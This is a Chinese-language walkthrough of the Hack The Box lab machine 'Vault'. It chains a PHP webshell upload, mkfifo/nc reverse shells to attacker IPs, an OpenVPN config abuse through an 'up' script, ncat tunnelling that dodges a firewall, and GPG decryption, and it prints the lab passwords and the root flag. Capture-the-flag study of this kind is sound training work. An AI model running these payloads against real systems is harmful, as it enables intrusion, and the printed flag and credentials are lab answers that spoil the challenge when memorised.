[Meachines] [Medium] Vault OpenVPN RCE+NC代理横向移动+GPG解密
字数 1125 2025-08-29 22:41:38
OpenVPN RCE + NC代理横向移动 + GPG解密攻击链分析
信息收集阶段
初始扫描
- 目标IP:
10.10.10.109 - 扫描命令:
ip='10.10.10.109'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e\31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
发现服务
- 开放端口:
- 22/tcp: OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
- SSH主机密钥:
- RSA: 2048 a69d0f7d7375bba8940ab7e3fe1f24f4
- ECDSA: 256 2c7c34eb3aeb0403ac48285409743d27
- ED25519: 256 98425fad8722926d72e6666c82c10983
- SSH主机密钥:
- 80/tcp: Apache httpd 2.4.18 (Ubuntu)
- 页面内容: 提到了"Sparklays"
- 22/tcp: OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
Web应用攻击
目录爆破
feroxbuster -u 'http://10.10.10.109/sparklays' -x php
发现路径: /sparklays/design/changelogo.php
文件上传漏洞利用
上传PHP webshell到changelogo.php:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f') ?>
使用curl访问上传的webshell:
curl -S http://10.10.10.109/sparklays/design/uploads/1.php5
获取初始凭据
在/home/dave/Desktop/发现密码:
password: Dav3therav3123
key>itscominghome
横向移动
SSH动态端口转发
ssh -D 1090 dave@10.10.10.109
内网扫描
time for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done
OpenVPN RCE漏洞利用
发现OpenVPN配置文件存在RCE漏洞,参考:
https://www.bleepingcomputer.com/news/security/downloading-3rd-party-openvpn-configs-may-be-dangerous-heres-why/
恶意OpenVPN配置:
remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 10032 >/tmp/f'"
nobind
获取SSH凭据
发现用户dave的SSH密码:
dav3gerous567
权限提升与横向移动
历史记录分析
cat /home/alex/.bash_history
日志分析
grep -rHa "192.168.5.2" /var/log
端口扫描绕过
nmap 192.168.5.2 -Pn -f
nmap 192.168.5.2 -Pn -f --source-port=4444
NC代理隧道搭建
- 使用NC连接目标:
nc 192.168.5.2 987 -p 53
- 设置本地监听端口:
SHELL=/bin/sh script -q /dev/null
/usr/bin/ncat -l 1801 --sh-exec "ncat 192.168.5.2 987 -p 53" &
- 通过隧道SSH连接:
ssh dave@localhost -p 1801 -t 'bash'
使用密码: dav3gerous567
GPG解密获取root flag
- 发现加密的root flag:
cat root.txt.gpg
- 使用GPG解密:
gpg -d root.gpg
使用密码: itscominghome
- 解密后的root flag:
ca468370b91d1f5906e31093d9bfe819
关键知识点总结
-
文件上传漏洞利用:
- 通过修改文件扩展名(.php5)绕过过滤
- 使用multipart/form-data上传webshell
-
OpenVPN RCE:
- 利用
script-security 2配置和up指令执行任意命令 - 通过反向shell建立连接
- 利用
-
NC代理横向移动:
- 使用ncat建立双向隧道
- 通过本地端口转发绕过防火墙限制
-
GPG解密:
- 需要获取密码短语才能解密文件
- 密码可能隐藏在系统文件或历史记录中
-
权限提升技巧:
- 分析用户历史记录和日志文件
- 查找内网其他主机和服务
- 使用非标准端口和协议绕过检测